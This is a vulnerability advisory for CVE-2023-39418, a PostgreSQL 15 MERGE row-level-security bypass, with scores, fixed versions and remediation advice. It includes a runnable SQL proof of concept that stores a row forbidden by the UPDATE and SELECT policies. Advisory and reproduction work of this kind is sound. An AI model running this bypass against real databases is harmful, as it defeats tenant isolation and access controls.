CVE-2023-39418
Postgresql: merge fails to enforce update or select row security policies
4.3
MEDIUM
CVSS 3.1
EPSS 0.47%
Description
PostgreSQL 15 introduced the MERGE command. In 15.0 through 15.3, MERGE fails to test new rows against the row security policies defined for UPDATE and SELECT on the target table. If the UPDATE and SELECT policies forbid rows that the INSERT policies do not forbid, a user who is allowed to run MERGE against the table can store such rows, bypassing the intent of the stricter policies. The fix shipped in PostgreSQL 15.4.
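The precondition the advisory describes, built up as a runnable psql script. This is an added example, not code from the PostgreSQL project or the advisory; the table name, role name and policy bodies are assumptions chosen so that the INSERT policy permits a row that the SELECT and UPDATE policies forbid. Run it as a superuser on a scratch database.

```sql
-- Added example, not code from the PostgreSQL project or the advisory.
-- "tickets", "app_user" and the policy bodies are assumptions chosen to
-- match the advisory's precondition: INSERT permits rows that SELECT and
-- UPDATE forbid. Run in psql as a superuser on a scratch database.

-- 0. Version check: the fix shipped in 15.4 (server_version_num 150400).
SELECT current_setting('server_version_num')::int >= 150400 AS has_fix;

CREATE ROLE app_user NOLOGIN;

CREATE TABLE tickets (
    id     int  PRIMARY KEY,
    owner  text NOT NULL,
    status text NOT NULL
);
GRANT SELECT, INSERT, UPDATE ON tickets TO app_user;
ALTER TABLE tickets ENABLE ROW LEVEL SECURITY;

-- SELECT and UPDATE: a user sees and modifies only their own open tickets
-- and may never write a row whose status is 'closed'.
CREATE POLICY tickets_select ON tickets FOR SELECT TO app_user
    USING (owner = current_user AND status <> 'closed');
CREATE POLICY tickets_update ON tickets FOR UPDATE TO app_user
    USING (owner = current_user AND status <> 'closed')
    WITH CHECK (owner = current_user AND status <> 'closed');
-- INSERT is looser on purpose: it checks ownership but not status.
CREATE POLICY tickets_insert ON tickets FOR INSERT TO app_user
    WITH CHECK (owner = current_user);

INSERT INTO tickets VALUES (1, 'app_user', 'open');

SET ROLE app_user;

-- Control: a plain UPDATE into the forbidden state is rejected on every
-- version: ERROR: new row violates row-level security policy for table "tickets"
UPDATE tickets SET status = 'closed' WHERE id = 1;

-- The same change through MERGE's UPDATE action. Per the advisory, 15.0
-- through 15.3 do not test the new row against the UPDATE and SELECT
-- policies, so the row is stored; 15.4 and later reject it like the UPDATE.
MERGE INTO tickets AS t
USING (VALUES (1, 'closed')) AS s(id, status)
    ON t.id = s.id
WHEN MATCHED THEN
    UPDATE SET status = s.status;

-- If the MERGE went through, app_user can no longer see ticket 1 (the
-- SELECT policy hides closed rows); if it was rejected, the open row is
-- still visible here.
SELECT * FROM tickets WHERE id = 1;

RESET ROLE;
-- The superuser bypasses RLS: status = 'closed' here means the MERGE
-- stored a row that the UPDATE and SELECT policies forbid.
SELECT id, owner, status FROM tickets WHERE id = 1;
```

The first SELECT is the check to keep: `server_version_num` of 150400 or higher means the server carries the fix. If you rely on RLS to separate tenants and any role can run MERGE, treat the result of the final SELECT on an unpatched 15.x server as evidence that UPDATE and SELECT policies were not the last line of defence for that table.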
How to fix CVE-2023-39418
To remediate CVE-2023-39418, upgrade the affected package to the fixed version listed below for your distribution and PostgreSQL major version (the package names were not preserved in this listing).
- — upgrade to 13.12-r0 or later
- — upgrade to 13.12-r0 or later
- — upgrade to 14.9-r0 or later
- — upgrade to 15.4-r0 or later
- — upgrade to 15.4.0 or later
- — upgrade to 15.5-0+deb12u1 or later
MERGE does not exist before PostgreSQL 15, so 13.x and 14.x servers cannot reach this bug; the 13.12 and 14.9 entries correspond to the upstream minor releases published alongside 15.4, not to code that contains it. The fix is in the server binary, so a restart of the service after the package upgrade is required for it to take effect.
Is CVE-2023-39418 being exploited?
Low. EPSS is 0.47%, a low estimated probability of exploitation in the wild, and exploitation activity has not been observed at scale. Note that an attacker needs an authenticated database role that is already permitted to run MERGE against an RLS-protected table (the CVSS vector's PR:L), so the realistic exposure is a multi-tenant or least-privilege deployment that relies on UPDATE and SELECT policies to confine such roles.
Affected packages (6)
- from 0, < 13.12-r0
- from 0, < 13.12-r0
- from 0, < 14.9-r0
- from 0, < 15.4-r0
- >= 15.0.0, < 15.4.0
- from 0, < 15.5-0+deb12u1
CVSS scores
| Source | CVSS version | Severity | Score | Vector |
|---|---|---|---|---|
| osv | 3.1 | MEDIUM | 4.3 | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N |